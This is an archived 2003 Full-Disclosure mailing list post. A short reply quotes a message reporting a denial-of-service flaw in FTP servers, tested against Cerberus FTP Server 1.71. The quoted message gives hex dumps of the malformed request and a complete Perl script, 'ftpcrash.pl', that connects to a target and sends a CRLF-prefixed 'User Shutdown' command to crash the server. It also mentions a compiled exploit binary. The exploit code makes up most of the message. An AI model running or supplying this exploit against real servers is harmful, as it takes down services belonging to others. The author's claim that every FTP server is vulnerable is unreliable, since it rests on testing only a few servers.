lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
From: aditya at online.gr8domain.biz (Aditya [Aditya Lalit Desgmukh])
Subject: FTPServer Denial Of Service Vulnerability

hi there,
no binaries please! the source code in enough....
  -----Original Message-----
  From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com]On Behalf Of Florian Rock
  Sent: Monday, August 18, 2003 6:34 PM
  To: vuln@...unia.com; full-disclosure@...ts.netsys.com
  Subject: [Full-Disclosure] FTPServer Denial Of Service Vulnerability


  I have found a very serious hole in FTPServer
  The Exploit is tested on Cerberus FTP Server 1.71 and a own coded, but I
think all FTPServer are Vulnerable
  Sorry but i have to less ftpserver to test

  And so it Works
  Typical request:
  00000000  55 73 65 72 20 53  68 75 74 64 6f 77 6e 0d 0a    User
Shutdown..

  Exploit request:
  00000000  0d 0a 55 73 65 72 20 53  68 75 74 64 6f 77 6e    ..User
Shutdown

  I've coded an exploit:
  See attached file: ftpcrash.exe (ziped) for people how have no perl

  My exploit (in perl):
  [code]
  -ftpcrash.pl-
  print "Exploit for FTP-Server\n";
  print "   by The real Remoter\n";
  my $usage = "\nftpcrash <IP> <Port>\n";
  die "$usage" unless $ARGV[0] && $ARGV[1];
  use Socket;
  my $remote = $ARGV[0];
  my $port = $ARGV[1];
  my $iaddr = inet_aton($remote);
  my $proto = getprotobyname("tcp");
  my $paddr = sockaddr_in($port, $iaddr);
  socket(SOCK, PF_INET, SOCK_STREAM, $proto);
  connect(SOCK, $paddr) or die "Can't connect to " . $remote;
  print "Sending exploit\n";
  $msg = "\x0d\x0a";
  $msg = $msg . "User Shutdown";
  send(SOCK,$msg, 0) or die "Can't send Exploit";
  sleep(1);
  print "Server Crashed!";
  sleep(1);
  exit;
  [/code]

  Sorry for my bad english (I'm german)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030820/c42e8f13/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 4337 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030820/c42e8f13/smime.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ